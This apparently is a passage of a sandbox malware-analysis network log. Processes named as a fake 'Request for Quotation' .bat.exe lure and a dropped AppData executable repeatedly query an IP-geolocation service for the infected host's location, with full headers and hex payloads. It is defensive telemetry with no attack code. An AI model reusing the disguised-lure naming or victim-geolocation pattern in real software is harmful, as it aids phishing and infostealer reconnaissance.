2024-11-20 08:33:08 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:08 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:08 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55497 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5KqMkGMCfhNN%2BdRGkdegLKnWvcpmaFblQ0g5COAaue1Tbj8%2F7YB5VedulOwxgmExGrYgmcKwyFR%2Bpfvb8H%2BfBLKNcJPQsIJOXlSkZYQLUN%2FGOaTyobjKmiLQpliNHJuJwgGiKGJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717eadf5742b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2199&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1326067&cwnd=230&unsent_bytes=0&cid=adbacdbefb965bc0&ts=168&x=0"
2024-11-20 08:33:08 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:09 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:09 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:09 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55498 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5lUGn7etptvDFNI%2Fu4s1f6IsoSxHWluItB8MvLYrDEyTEp3WPa2XkSGWU2lxd6hDuFIKHL%2BViFacKIZc1eZXW8ZajjDJDT5%2BDqSfqRfDwPQgn4ccy3DVcH%2F3VD4l2oiMIu5QBi4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717f2a8271778-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1476&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1906005&cwnd=104&unsent_bytes=0&cid=adde82f5c564b98a&ts=152&x=0"
2024-11-20 08:33:09 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:10 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:10 UTC	850	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:10 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55499 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksGchieigfUw9CyIn5OOWnNOSAgtKkEY0z3RAL1Up0uR%2FszohMu6kPuIGW34mpb%2BHK3RTMsy7oMc4YyjLc9TiDfWtJ26HD4hlqko%2F5vOxJOtyq6HYbKqugH2USiKzWYodKy792OP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717fa2ccc6a5c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2445&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1172219&cwnd=241&unsent_bytes=0&cid=b75b212fad03fea9&ts=160&x=0"
2024-11-20 08:33:10 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:10 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:10 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:10 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55499 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNI4l1xb53JB9KDMcfGuTIeL74g9hNZrAcpQfzZY%2BngIxjP4M2%2FWcTpFAI9CrwevTfcOD%2BlpZsPTgPNefFgD4gVymWLBVGxV49eFnv6lnF3LTXD6y%2BOyBzZDEYvb51wLZ6y46hGP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717fb38388c96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1477732&cwnd=188&unsent_bytes=0&cid=c02d1f4499a79d06&ts=301&x=0"
2024-11-20 08:33:10 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:11 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:11 UTC	862	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:11 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55500 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fis8iyAKttJzeSPk6NojID%2BljyFhxYvAHjZdnqoUrDVC%2FBSO4PxYR3vIkn%2BqCztQvdbLVdgGIDQlIxF%2Bo4W%2BbU1dzR4tNthkWTlfL4ZGBqWDSP1RA5ejSLw%2F%2FR%2FSwMXi0gblkju8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5718001eb97293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1401151&cwnd=154&unsent_bytes=0&cid=95d14283f8aa875b&ts=153&x=0"
2024-11-20 08:33:11 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:11 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:12 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:11 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55500 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VMt%2FNcKvgofy9IJgEg9Qu8%2Fn5aabzkW5DPb0xJlWkBua88HJ8%2B69ndO80m%2B9dU3F7POrdQbo0aWQo1RlT%2BK4EydvSeXMtMXqulaukBQrFoVoixhuRN4fTCCWY1BFUv8cdz%2F5AX0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e571801b8ca7287-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1580942&cwnd=177&unsent_bytes=0&cid=1c16d7abd8b6cfae&ts=158&x=0"
2024-11-20 08:33:12 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49726	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:12 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:12 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:12 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55501 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bN1NBDg%2BSRD0VdeoAkBUAUjEXlGoyGqJnWo9EE3%2FrrVs9%2FWwZlOUAO9k1qWGOEsOqyaLv9PjeLSCuDA6zCHSa7qvg%2BaRe4%2Fa33iihh9exTe59uelrNaczYPihdtgepAwvulDc8Tq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e571807883c7ced-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1841&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1640449&cwnd=179&unsent_bytes=0&cid=0979e7998683cb08&ts=151&x=0"
2024-11-20 08:33:12 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49727	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:13 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:13 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55502 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e43wO%2FFSnfikD8C3OmOA1jL4HVWnA%2FlCb4fDNwmD0nqqqjv%2BCfeMjTKHsCmbwHDQi%2BHOALj5P7Os4jC72Q%2BiVhaygPypfCjaCGSS88aTxSq5%2F9UzhCn36nxbQytcfcC6wPy3rs13"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5718099be241f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1651583&cwnd=221&unsent_bytes=0&cid=7200a3df606f34a8&ts=149&x=0"
2024-11-20 08:33:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49730	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:14 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:14 UTC	850	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:14 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55503 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FkgN%2BboPKKOMznLxab5pir7qNqHAkkPVcdR1JHmH%2BzLONPhPVFzPbFGtPyukHBA1n15s3LKJQEqN1XyAOxc28D5yO6pQpIARTCRHgE1xS49iXR2cccfyTcuuDcpIyvh8i67Wk0q5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57180f2ad90dc7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1894&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1476238&cwnd=224&unsent_bytes=0&cid=97b34895ffbe4aa2&ts=152&x=0"
2024-11-20 08:33:14 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49731	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:14 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:14 UTC	846	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:14 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55503 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g30U7DR9IfgEfrMOPcrQHLfgnFQqDxmKFNSQ3JzwY7770w8Q%2Fhb7dPk2vM7QFWnMPbtl65qlV3p04YIRnhko7KYgZfMBuOPtE5IqqCYyOCtF2XnmeK9q61ALEgDD296kvbeo6xov"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e571811bc1f72b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1446977&cwnd=167&unsent_bytes=0&cid=3f31458dd99a9b10&ts=144&x=0"
2024-11-20 08:33:14 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: 